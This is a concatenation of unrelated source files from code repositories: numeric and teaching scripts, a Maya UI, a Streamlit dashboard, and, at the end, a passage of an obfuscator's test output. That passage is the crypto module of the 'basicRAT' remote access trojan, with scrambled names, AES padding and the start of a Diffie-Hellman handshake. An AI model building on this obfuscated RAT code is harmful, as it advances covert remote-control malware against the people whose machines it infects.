oid sha256:39364c7930721e7cc70c7da8107affc5b3e0356146825b0ee4d41d5a6b47b20f
size 858
| [
"[email protected]"
] | |
6d4d9a6b5cf7732ea1bdc9a1514340ec7eafad4d | 0a9e72d2527a2d82086b8c56ef23c9e9903e3da3 | /russian_roulette/RussianRoulette.py | d0c2ba3861197b9d51598f15d79a22c7e5a55170 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
] | permissive | karlnapf/ozone-roulette | 6bfcab10dee8b9dd95833bd15c1a3702c2f9769e | df99b11c3b00a27440b094427d485b2fea858903 | refs/heads/master | 2021-01-01T05:30:21.389668 | 2015-02-03T09:09:40 | 2015-02-03T09:10:01 | 12,896,509 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 3,664 | py |
from abc import abstractmethod
from numpy.lib.function_base import delete
from numpy.ma.core import mean, zeros, log, arange, std
from numpy.random import permutation, rand
import logging
class RussianRoulette(object):
def __init__(self, threshold, block_size=1):
self.threshold = threshold
self.block_size = block_size
@abstractmethod
def get_estimate(self, estimates, index):
start_idx = index * self.block_size
stop_idx = index * self.block_size + self.block_size
# if there are enough samples, use them, sub-sample if not
if stop_idx <= len(estimates):
logging.debug("Averaging over %d samples from index %d to %d" %
(self.block_size, start_idx, stop_idx))
indices = arange(start_idx, stop_idx)
else:
logging.debug("Averaging over a random subset of %d samples" %
self.block_size)
indices = permutation(len(estimates))[:self.block_size]
return mean(estimates[indices])
def exponential(self, estimates):
logging.debug("Entering")
# find a strict lower bound on the estimates and remove it from list
bound = estimates.min()
bound_idx = estimates.argmin()
estimates = delete(estimates, bound_idx)
estimates = estimates - bound
# find an integer close to the mean of the transformed estimates and divide
E = max(int(round(abs(mean(estimates)))), 1)
estimates = estimates / E
logging.info("Using %f as lower bound on estimates" % bound)
logging.info("Computing product of E=%d RR estimates" % E)
logging.info("Std-deviation after scaling is %f" % std(estimates))
# index for iterating through the used estimates
# (might be averaged, so might be lower than the number of available estimates
# if the block size is greater than one
estimate_idx = 0
samples = zeros(E)
for iteration in range(E):
weight = 1
# start with x^0 which is 1
samples[iteration] = 1
term = 1
# index for computed samples
series_term_idx = 1
while weight > 0:
# update current term of infinite series
# average over block
x_inner = self.get_estimate(estimates, estimate_idx)
term *= (x_inner / series_term_idx)
# if summation has reached threshold, update weights
if abs(term) < self.threshold:
q = term / self.threshold
if rand() < q:
# continue and update weight
weight = weight / q
else:
# stop summation
weight = 0
samples[iteration] += weight * term;
estimate_idx += 1
series_term_idx += 1
logging.info("RR estimate %d/%d with threshold %.2f is %.4f and took %d series terms" %
(iteration + 1, E, self.threshold, samples[iteration], series_term_idx))
# now put things together. Note that samples contains an unbiased estimate
# which might be quite small. However, due to the removal of the bound,
# this will not cause an underflow and we can just take the log.
logging.debug("Leaving")
return bound + sum(log(samples));
| [
"[email protected]"
] | |
4f58fdd8fecd723dc0c3f7a5d4aab0f22eb56328 | 64e498b6b6cd6a2cf6855331d66d81b51ee1cdde | /src/bug/relationchoice/__init__.py | b98663e38b15b4eb0d52192e1440e558a938d1c9 | [] | no_license | nutjob4life/bug.relationchoice | 8d3d4c6223bf70d1b8b9e8fe639bfb89168ca748 | 26bf0d968c7f86e19ea36025d930fc01519c5390 | refs/heads/master | 2020-05-18T04:53:59.892557 | 2014-12-18T19:42:42 | 2014-12-18T19:42:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 44 | py | # encoding: utf-8
'''bug.relationchoice'''
| [
"[email protected]"
] | |
5e392dbeec98a689c52d64e02a4d0985d70efdef | 8afb5afd38548c631f6f9536846039ef6cb297b9 | /_MY_ORGS/Web-Dev-Collaborative/blog-research/Data-Structures/1-Python/matrix/sudoku_validator.py | 7bda6e4241502010a2301498fe39b6c447b205d9 | [
"MIT"
] | permissive | bgoonz/UsefulResourceRepo2.0 | d87588ffd668bb498f7787b896cc7b20d83ce0ad | 2cb4b45dd14a230aa0e800042e893f8dfb23beda | refs/heads/master | 2023-03-17T01:22:05.254751 | 2022-08-11T03:18:22 | 2022-08-11T03:18:22 | 382,628,698 | 10 | 12 | MIT | 2022-10-10T14:13:54 | 2021-07-03T13:58:52 | null | UTF-8 | Python | false | false | 2,478 | py | """
Write a function validSolution/ValidateSolution/valid_solution() that accepts a 2D array representing a Sudoku board, and returns true if it is a valid solution, or false otherwise. The cells of the sudoku board may also contain 0's, which will represent empty cells. Boards containing one or more zeroes are considered to be invalid solutions.
The board is always 9 cells by 9 cells, and every cell only contains integers from 0 to 9.
(More info at: http://en.wikipedia.org/wiki/Sudoku)
"""
# Using dict/hash-table
from collections import defaultdict
def valid_solution_hashtable(board):
for i in range(len(board)):
dict_row = defaultdict(int)
dict_col = defaultdict(int)
for j in range(len(board[0])):
value_row = board[i][j]
value_col = board[j][i]
if not value_row or value_col == 0:
return False
if value_row in dict_row:
return False
else:
dict_row[value_row] += 1
if value_col in dict_col:
return False
else:
dict_col[value_col] += 1
for i in range(3):
for j in range(3):
grid_add = 0
for k in range(3):
for l in range(3):
grid_add += board[i*3+k][j*3+l]
if grid_add != 45:
return False
return True
# Without hash-table/dict
def valid_solution(board):
correct = [1, 2, 3, 4, 5, 6, 7, 8, 9]
# check rows
for row in board:
if sorted(row) != correct:
return False
# check columns
for column in zip(*board):
if sorted(column) != correct:
return False
# check regions
for i in range(3):
for j in range(3):
region = []
for line in board[i*3:(i+1)*3]:
region += line[j*3:(j+1)*3]
if sorted(region) != correct:
return False
# if everything correct
return True
# Using set
def valid_solution_set (board):
valid = set(range(1, 10))
for row in board:
if set(row) != valid:
return False
for col in [[row[i] for row in board] for i in range(9)]:
if set(col) != valid:
return False
for x in range(3):
for y in range(3):
if set(sum([row[x*3:(x+1)*3] for row in board[y*3:(y+1)*3]], [])) != valid:
return False
return True
| [
"[email protected]"
] | |
542a65e7cf0987e43c313ec125817c182f6c4308 | e66eb0234d09b732b52c839058a830bee486fd30 | /list_operations.py | 6e136a5fe261e154cc5ab0633b4d3bcc537ce7b0 | [] | no_license | nt-git/list-slicing | 44d10c350b0e0248cfcc18cf795bab07bb5f4a5b | 5f8a8290a4b040bef1ddbfe7b6e559a46d01f67e | refs/heads/master | 2021-05-14T13:08:26.640954 | 2018-01-05T21:08:11 | 2018-01-05T21:08:11 | 116,427,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,306 | py | """Functions that manipulate lists without using Python's built-in list methods.
The fundamental operations on lists in Python are those that are part of the
language syntax and/or cannot be implemented in terms of other list operations.
They include:
* List indexing (some_list[index])
* List indexing assignment (some_list[index] = value)
* List slicing (some_list[start:end])
* List slicing assignment (some_list[start:end] = another_list)
* List index deletion (del some_list[index])
* List slicing deletion (del some_list[start:end])
Implement functions that each use just one of the above operations.
The docstring of each function describes what it should do.
DO NOT USE ANY OF THE BUILT IN LIST METHODS, OR len()!
"""
def head(input_list):
"""Return the first element of the input list.
For example:
>>> head(['Jan', 'Feb', 'Mar'])
'Jan'
"""
return input_list[0]
def tail(input_list):
"""Return all elements of the input list except the first.
For example:
>>> tail(['Jan', 'Feb', 'Mar'])
['Feb', 'Mar']
"""
return input_list[1:]
def last(input_list):
"""Return the last element of the input list.
For example:
>>> last(['Jan', 'Feb', 'Mar'])
'Mar'
"""
return input_list[-1]
def init(input_list):
"""Return all elements of the input list except the last.
For example:
>>> init(['Jan', 'Feb', 'Mar'])
['Jan', 'Feb']
"""
return input_list[:-1]
##############################################################################
# Do yourself a favor and get a short code review here.
def first_three(input_list):
"""Return the first three elements of the input list.
For example:
>>> first_three(['Jan', 'Feb', 'Mar', 'Apr', 'May'])
['Jan', 'Feb', 'Mar']
"""
return input_list[0:3]
def last_five(input_list):
"""Return the last five elements of the input list.
For example:
>>> last_five([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[15, 18, 21, 24, 27]
"""
return input_list[-5:]
def middle(input_list):
"""Return all elements of input_list except the first two and the last two.
For example:
>>> middle([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[6, 9, 12, 15, 18, 21]
"""
return input_list[2:-2]
def inner_four(input_list):
"""Return the third, fourth, fifth, and sixth elements of input_list.
For example:
>>> inner_four([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[6, 9, 12, 15]
"""
return input_list[2:6]
def inner_four_end(input_list):
"""Return the elements that are 6th, 5th, 4th, and 3rd from the end of input_list.
This function should return those elements in a list, in the exact order
described above.
For example:
>>> inner_four_end([0, 3, 6, 9, 12, 15, 18, 21, 24, 27])
[12, 15, 18, 21]
"""
return input_list[-6:-2]
def replace_head(input_list):
"""Replace the head of input_list with the value 42 and return nothing.
For example:
>>> multiples = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27]
>>> replace_head(multiples)
>>> multiples == [42, 3, 6, 9, 12, 15, 18, 21, 24, 27]
True
"""
input_list[0] = 42
return
def replace_third_and_last(input_list):
"""Replace third and last elements of input_list with 37 and return nothing.
For example:
>>> multiples = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27]
>>> replace_third_and_last(multiples)
>>> multiples == [0, 3, 37, 9, 12, 15, 18, 21, 24, 37]
True
"""
input_list[2] = 37
input_list[-1] = 37
return
def replace_middle(input_list):
"""Replace all elements of a list but the first and last two with 42 and 37.
After the replacement, 42 and 37 should appear in that order in input_list.
Return nothing.
For example:
>>> multiples = [0, 3, 6, 9, 12, 15, 18, 21, 24, 27]
>>> replace_middle(multiples)
>>> multiples == [0, 3, 42, 37, 24, 27]
True
"""
input_list[2:-2] = [42, 37]
return
def delete_third_and_seventh(input_list):
"""Remove third and seventh elements of input_list and return nothing.
For example:
>>> notes = ['Do', 'Re', 'Mi', 'Fa', 'So', 'La', 'Ti', 'Do']
>>> delete_third_and_seventh(notes)
>>> notes == ['Do', 'Re', 'Fa', 'So', 'La', 'Do']
True
"""
del input_list[2]
del input_list[5]
return
def delete_middle(input_list):
"""Remove all elements from input_list except the first two and last two.
Return nothing.
For example:
>>> notes = ['Do', 'Re', 'Mi', 'Fa', 'So', 'La', 'Ti', 'Do']
>>> delete_middle(notes)
>>> notes == ['Do', 'Re', 'Ti', 'Do']
True
"""
while len(input_list) > 4 :
input_list.pop(2)
return
##############################################################################
# END OF MAIN EXERCISE. Yay! You did it! You Rock!
#
# Please ask for a code review from an Education team member before proceeding.
##############################################################################
# This is the part were we actually run the doctests.
if __name__ == "__main__":
import doctest
result = doctest.testmod()
if result.failed == 0:
print "ALL TESTS PASSED"
| [
"[email protected]"
] | |
5e10aabc613ae7de645ef94312a9a1bc985b98cf | aa0366a8632f334fb35e6bdc78717f3456202eb7 | /bp/characterKit.py | 21b2ade02cf6076383350c1d725ab0a82e74ea12 | [] | no_license | Mortaciunea/bdScripts | 0891478096f3a5876655896c9649c0a7204d5ee8 | 4f6e9d2b181bb4a90c1ccfcaca64c22ecbe0dd59 | refs/heads/master | 2020-12-24T13:36:57.930038 | 2015-09-03T16:03:46 | 2015-09-03T16:03:46 | 41,869,547 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,057 | py | import pymel.core as pm
import pymel.core.datatypes as dt
import re,os,shutil,glob
import logging
import shiboken
import PySide.QtGui as QtGui
import PySide.QtCore as QtCore
import maya.OpenMayaUI
def get_maya_window():
maya_window_util = maya.OpenMayaUI.MQtUtil.mainWindow()
maya_window = shiboken.wrapInstance( long( maya_window_util ), QtGui.QWidget )
return maya_window
characterKitWin = 'characterKitWindow'
class CharacterKitUI(QtGui.QMainWindow):
def __init__(self,parent=get_maya_window()):
if pm.window( characterKitWin, exists = True, q = True ):
pm.deleteUI( characterKitWin)
super(CharacterKitUI,self).__init__(parent)
self.setObjectName(characterKitWin)
self.setWindowTitle('Character Kit 2.1')
centralWidget = QtGui.QWidget()
mainLayout = QtGui.QVBoxLayout()
leftSideListsLSplitter = QtGui.QSplitter(QtCore.Qt.Vertical)
rightSideListsLSplitter = QtGui.QSplitter(QtCore.Qt.Horizontal)
#left side lists
#characters list
self.charactersList = QtGui.QListView()
#skins list
self.skinsList = QtGui.QListView()
#body parts list
self.bodyPartsList = QtGui.QListView()
leftSideListsLSplitter.addWidget(self.charactersList)
leftSideListsLSplitter.addWidget(self.skinsList)
leftSideListsLSplitter.addWidget(self.bodyPartsList)
mainLayout.addWidget(leftSideListsLSplitter)
centralWidget.setLayout(mainLayout)
self.setCentralWidget(centralWidget)
#menu bar
self.addMenu()
self.show()
self.resize(860,600)
def addMenu(self):
self.menuBar = self.menuBar()
self.fileMenu = self.menuBar.addMenu('File')
self.fileMenu.addAction('Load skeleton')
self.fileMenu.addAction('Save skeleton')
self.toolsMenu = self.menuBar.addMenu('Tools')
self.toolsMenu.addAction('Create Picking Geometry')
| [
"[email protected]"
] | |
400ddf4c1c830f1adf3d42e1f2ef065c19735ef2 | b08b373d78fb42dbb11aebeadf71168dc6476696 | /pycharm_programs/mme-methods/henbgw_count.py | d84e97c0fedf37a1d818f56f5e2f6731fc524b0b | [] | no_license | lajapathy/python-practice | 40a44a026546d1f3414452a99a68487a14df3c02 | 869a59cad89077327bb8117c34801af985a63e0d | refs/heads/master | 2022-02-25T14:59:52.155959 | 2019-09-24T07:16:58 | 2019-09-24T07:16:58 | 121,089,806 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 950 | py | import re
def henbgw_count(self):
for chassis in self.get_dut_list():
config_lines = self._send(["show config"], chassis)
henbgw_mgmt_db_name_from_config = ''
henbgw_mgmt_db_name_from_cli_output = ''
for line in config_lines:
if "associate henbgw-mgmt-db" in line:
henbgw_mgmt_db_name_from_config = re.match('\s*associate henbgw-mgmt-db\s*(.*)\s*',line).group(1)
break
cli_output = self._send(["show lte-policy mme henbgw mgmt-db summary"], chassis)
for line in cli_output:
if "HenbGW Management DB" in line:
henbgw_mgmt_db_name_from_cli_output = re.match('\s*HenbGW Management DB\s*(.*)\s*',line).group(1)
break
if henbgw_mgmt_db_name_from_cli_output != henbgw_mgmt_db_name_from_config:
return SystestResult(1, henbgw_mgmt_db_name_from_cli_output)
#Now, we verify henbgw count
| [
"[email protected]"
] | |
0dc4c9fb7b5faa84b43a579fbd289c735ff7794f | 8fd92c0a65c9b3e3912b6e8ef043656ee225880a | /EXAMPLES/np_create_ranges.py | e1aa89ab7ab9a7f0785f17f77b6c152021baa25a | [] | no_license | waiteb15/py3forsci3day | 9fbcbb59f1c14f3d91cb2599d7ca8b4d6ac628c4 | fc664042618f0910d40e85677a2438eef5cce2b7 | refs/heads/master | 2020-04-25T11:24:18.697218 | 2019-02-28T23:40:52 | 2019-02-28T23:40:52 | 172,743,315 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 347 | py | #!/usr/bin/env python
import numpy as np
r1 = np.arange(50)
print(r1)
print("size is", r1.size)
print()
r2 = np.arange(5,101,5)
print(r2)
print("size is", r2.size)
print()
r3 = np.arange(1.0,5.0,.3333333)
print(r3)
print("size is", r3.size)
print()
r4 = np.linspace(1.0, 5.0, 7)
print(r4)
print("size is", r4.size)
print() | [
"[email protected]"
] | |
ab6d591fb1096d67a92f1b2f9be58d471222ea9a | 37fef592f365194c28579f95abd222cc4e1243ae | /streamlit/book_recommender/Overview.py | 3a38ef090b172cb0a6ec3907446d749998ff6fca | [] | no_license | edimaudo/Python-projects | be61e0d3fff63fb7bd00513dbf1401e2c1822cfb | 85d54badf82a0b653587a02e99daf389df62e012 | refs/heads/master | 2023-04-07T03:26:23.259959 | 2023-03-24T12:03:03 | 2023-03-24T12:03:03 | 72,611,253 | 4 | 3 | null | 2022-10-31T18:10:41 | 2016-11-02T06:37:17 | null | UTF-8 | Python | false | false | 3,298 | py | #================
# Book Overview
#================
# Load libraries
import streamlit as st
import pandas as pd
import plotly.express as px
import os, os.path
st.title('Book Overview')
@st.cache
def load_data(DATA_URL):
data = pd.read_csv(DATA_URL)
data.dropna(inplace=True)
return data
# Load data
books = load_data("BX-Books_clean.csv")
users = load_data("BX-Users_clean.csv")
ratings = load_data("BX-Book-Ratings_clean.csv")
#====================
# Raw data
#====================
st.subheader("Book data")
with st.expander("Open to see more",expanded=False):
st.dataframe(books)
st.subheader("Book Data Summary")
# AVERAGE RATING
average_rating = "{:.2f}".format(ratings['bookRating'].mean())
# AVERAGE AGE
average_age= "{:.2f}".format(users['Age'].mean())
# NUMBER OF USERS
number_of_users = users['userID'].count()
# NUMBER OF BOOKS
number_of_books = books['ISBN'].count()
# TOP 5 PUBLISHERS AND BOTTOM 5 PUBLISHERS
book_info = books.groupby(["publisher"]).size().reset_index(name='count')
book_info.columns = ['Publisher','Count']
book_info = book_info.sort_values("Count", ascending=False)
top_5_publishers = book_info.head(5)
bottom_5_publishers = book_info.tail(5)
# TOP 5 AUTHORS AND BOTTOM 5 AUTHORS
author_info = books.groupby(["bookAuthor"]).size().reset_index(name='count')
author_info.columns = ['Author','Count']
author_info = author_info.sort_values("Count", ascending=False)
top_5_authors = author_info.head(5)
bottom_5_authors = author_info.tail(5)
# NUMBER OF BOOKS BY YEAR
book_year_info = books.groupby(["yearOfPublication"]).size().reset_index(name='count')
book_year_info.columns = ['Year','Count']
book_year_info = book_year_info.sort_values("Year", ascending=False)
# TOP AND BOTTOM 5 COUNTRIES
country_info = users.groupby(["Country"]).size().reset_index(name='count')
country_info.columns = ['Country','Count']
country_info = country_info.sort_values("Count", ascending=False)
top_5_countries = country_info.head(5)
bottom_5_countries = country_info.tail(5)
# Metrics
metric1_column, metric2_column,metric3_column,metric4_column = st.columns(4)
metric1_column.metric("Avg. Rating", average_rating)
metric2_column.metric("# of Users", number_of_users)
metric3_column.metric("# of Books", number_of_books)
metric4_column.metric("Avg. Age", average_age)
# Publisher
st.subheader("Top and Bottom 5 Publishers")
st.write("Top 5 Publishers")
output = px.bar(top_5_publishers, x="Publisher", y="Count")
st.plotly_chart(output)
st.write("Bottom 5 Publishers")
output = px.bar(bottom_5_publishers, x="Publisher", y="Count")
st.plotly_chart(output)
# Author
st.subheader("Top and Bottom 5 Authors")
st.write("Top 5 Authors")
output = px.bar(top_5_authors, x="Author", y="Count")
st.plotly_chart(output)
st.write("Bottom 5 Authors")
output = px.bar(bottom_5_authors, x="Author", y="Count")
st.plotly_chart(output)
# Country
st.subheader("Top and Bottom 5 Countries")
st.write("Top 5 Countries")
output = px.bar(top_5_countries, x="Country", y="Count")
st.plotly_chart(output)
st.write("Bottom 5 Countries")
output = px.bar(bottom_5_countries, x="Country", y="Count")
st.plotly_chart(output)
# books by year
st.subheader("Books by Year Trend")
output = px.line(book_year_info, x="Year", y="Count")
st.plotly_chart(output)
| [
"[email protected]"
] | |
bb0b96e5d3a9763e899440f021b68306c0ff6345 | 022a0cb0d0873da0c25da6b6aa8b258b80a4b7e0 | /165.py | 933086226d00282a90482d8c4273a8718bea1615 | [] | no_license | subayadhav/fri07061 | 31e1e89ac1be60c736450f749486651968cfeba4 | 380f5d108869ad4cde16140dc21a88f2a7972722 | refs/heads/master | 2020-06-01T06:43:17.094510 | 2019-06-07T08:47:49 | 2019-06-07T08:47:49 | 190,683,539 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 130 | py | n1,k=map(int,input().split())
l=[int(x) for x in input().split()]
l.sort()
for i in l:
if i>k:
print(i)
break
| [
"[email protected]"
] | |
fc6e66e86ac585463ab601ee7c6f9640e45dda1d | 66940384fbc655f8e173d8f6b05c01494f6b7b8e | /intensio/test/python/advanced/output/basicRAT/core/crypto.py | 7e1ef673b97e2fe1c9bef3e28fe30d76d84d9c92 | [
"MIT",
"Unlicense"
] | permissive | a7t0fwa7/Intensio-Obfuscator | 15ab89a6593e0a22ee7f34a90174fe1f89442722 | bc86392c3f19a2c8fd87e926d285c5b249cb5de6 | refs/heads/master | 2022-01-24T01:04:53.199138 | 2019-06-16T08:49:27 | 2019-06-16T08:49:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 10,298 | py | # -*- coding: utf-8 -*-
import os
from Crypto import Random
from Crypto.Cipher import AES
from Crypto.Hash import SHA256
from common import wWtKmzLluyGJQdDKJuhxDRVbBkKUuxrBjlkmMbEpRDNMHvFKVoClMZaiofwOBNMkliYNwCOoxwPDlEWsjfqccRzMMfLIzAZTKQCzzfwHiIvBDKnaeeNarleUiQRJVWjT, OoUSTzYrmbsTlbduPEWrYyVFuKVoKRljNvnbOjqTIgSdocbQScmInoalUrDdCGzSAUtEMlyUiiPDIfUrDGHpipJHNDMIZMJxZrDHNobyrEMDhdSfWLrpnTiVLoRYJsvh
bKkoWEPoGHkOdCuDbjRHTgCCPekyeENZbTssJexqZEUygHLhQNFExxUjzRtULnGEYSnbqtkNUKmHnDcHfXJvocITDEcamtGZQfPRRwDCUcnzIfnoDfGVVJkHGHtgwhNC = 'b14ce95fa4c33ac2803782d18341869f'
class EAdXIuFoUGZAVpoCdvIEeqyMfkZRAtGhRCdcUGanSOUqndHlCVMyurPpBENHfhjGLkFDAUUrIraObXfxkUSFdjrmbRFeJXtMINFJltXdDWTwfsirIyQDGRNBzMzzvfWL(Exception):
pass
def gEldrYdtgILwZMCzKXnshgTsysMFuzlcoMlTWRtHgLCOdhqCcafsfUfdWehMrjGrSRhOpKCFlZtiNjeDCGmCPEFNvRgmNhCiFxRbmSUUIhZIUqjSGhdJaRxYFIECjOcH(IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb, IPaqVWdkIVTvfiDLmdrJfQiTJwegaBlDpVDqohKftHhsOOePvQsmThqrMFRmaWzudOgIwwDCzubKrVsrsPkJzkiLLOwFWZWQjEXHmYWWqJmsQBCiHHCnYAjgfqvSlGSJ=AES.block_size):
FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi = (IPaqVWdkIVTvfiDLmdrJfQiTJwegaBlDpVDqohKftHhsOOePvQsmThqrMFRmaWzudOgIwwDCzubKrVsrsPkJzkiLLOwFWZWQjEXHmYWWqJmsQBCiHHCnYAjgfqvSlGSJ - (len(IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb) % IPaqVWdkIVTvfiDLmdrJfQiTJwegaBlDpVDqohKftHhsOOePvQsmThqrMFRmaWzudOgIwwDCzubKrVsrsPkJzkiLLOwFWZWQjEXHmYWWqJmsQBCiHHCnYAjgfqvSlGSJ))
return IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb + (chr(FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi)*FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi)
def QjHzhUCTrwVefddXugONOhThvXziTmlfyjZrYxyadqwmwAuyxIlIWyNbHcUpjUaeHVChIDTpNzDYHXHyXYhzjzdjSgttsMmVzcnfqObmLfjpiVrDNUCtuKhPvaThRSLT(IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb):
FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi = IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb[-1]
if IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb.endswith(FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi*ord(FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi)):
return IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb[:-ord(FwHRyNZozIMXdyiZJsHankgCFFzlmlBwAqYTfncWWtBopgSMloKceEAEEmOuaRJChsmKsmaKCQvxFiNLfBSYpsfksAjVXqjBTJUAOwQvWvTmOHgUPqmqyxxOzGojyCmi)]
raise EAdXIuFoUGZAVpoCdvIEeqyMfkZRAtGhRCdcUGanSOUqndHlCVMyurPpBENHfhjGLkFDAUUrIraObXfxkUSFdjrmbRFeJXtMINFJltXdDWTwfsirIyQDGRNBzMzzvfWL("PKCS7 improper padding {}".format(repr(IMDyoarXIvJTJdWJCGOFHRGoYpyZOQwMQswXgCqqBYZPwHmEKWHFgWvSTOWflvFAvItvdYVDBYxOTEcVQJMpmSLVlLEeHFdwjSDhVtFcIpGmGyKHqEoogvSnIVeJcmTb[-32:])))
def QEuFRUGHmmUbsvbUVasrWrQhxiSXYrFkyajmxvyynxaznvtWMoioEgFDdRaSLMbuYzItmBnItyFshzmvtSRgiQHDPMyGaDupFmxxVuhmqWZaOEmAoAzIcmbEAKJiDHLT(sock, oSdNVlnenTDFzAfFSqUcqnfHRKHnFdxlORnUvNBQGifCilXmgQnMAEgTZhzBNgkVXCQogdMmXpkgKTqRCqJLQWMEymEnxGkPlhZSkjYaGJbgPoKWnFKSAvpEPhTuBUYF=True, bits=2048):
gHhWmUaToMTVPuLkTzZBiWKYnZGdFshkAhhQbzeEpsgVCtnEyCBfxWNXBdDfDOlIqpoXJLfxkNQQxgWrtWOWXkyBrgRMBnkQXARhtzeDlSEgXWnreULTtzLOeDjCARZA = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF;
lzwDXxlVdllygWgkWWzrzQAohkjehIDHCcuOLrVoCjQcdBirmqVsHochnlurqrBocxodNUcNDyFTEItimbHXDtEYGbLauxhPQUfGVtvjSVPJYKlaaeJZCLiqGOqNTLDx = 2
dcqwDxyKfGLRYrNbxalVWtalhDWTwnDqMFBzeKinEPrZcdVKuOrVKkjbwkIOakfseiRmhoRcAgajomIRatVETfRLikeKBOhnFcJZjzOwdPIeOpBkSDsGsSTcxjoFbJGf = OoUSTzYrmbsTlbduPEWrYyVFuKVoKRljNvnbOjqTIgSdocbQScmInoalUrDdCGzSAUtEMlyUiiPDIfUrDGHpipJHNDMIZMJxZrDHNobyrEMDhdSfWLrpnTiVLoRYJsvh(os.urandom(32))
OyGHFspVyMJhhtkOZiMSiKLAWfYOGjjYhfZcREsgEGCoRhdNwyiIJIJOfjMeoZkFJiPitnmTwMvsUCZpHLZJsfLLpbSfDYZMjqhdxyGSQxiEmSYomHyepLDoxakqrYMJ = pow(lzwDXxlVdllygWgkWWzrzQAohkjehIDHCcuOLrVoCjQcdBirmqVsHochnlurqrBocxodNUcNDyFTEItimbHXDtEYGbLauxhPQUfGVtvjSVPJYKlaaeJZCLiqGOqNTLDx, dcqwDxyKfGLRYrNbxalVWtalhDWTwnDqMFBzeKinEPrZcdVKuOrVKkjbwkIOakfseiRmhoRcAgajomIRatVETfRLikeKBOhnFcJZjzOwdPIeOpBkSDsGsSTcxjoFbJGf, gHhWmUaToMTVPuLkTzZBiWKYnZGdFshkAhhQbzeEpsgVCtnEyCBfxWNXBdDfDOlIqpoXJLfxkNQQxgWrtWOWXkyBrgRMBnkQXARhtzeDlSEgXWnreULTtzLOeDjCARZA)
if oSdNVlnenTDFzAfFSqUcqnfHRKHnFdxlORnUvNBQGifCilXmgQnMAEgTZhzBNgkVXCQogdMmXpkgKTqRCqJLQWMEymEnxGkPlhZSkjYaGJbgPoKWnFKSAvpEPhTuBUYF:
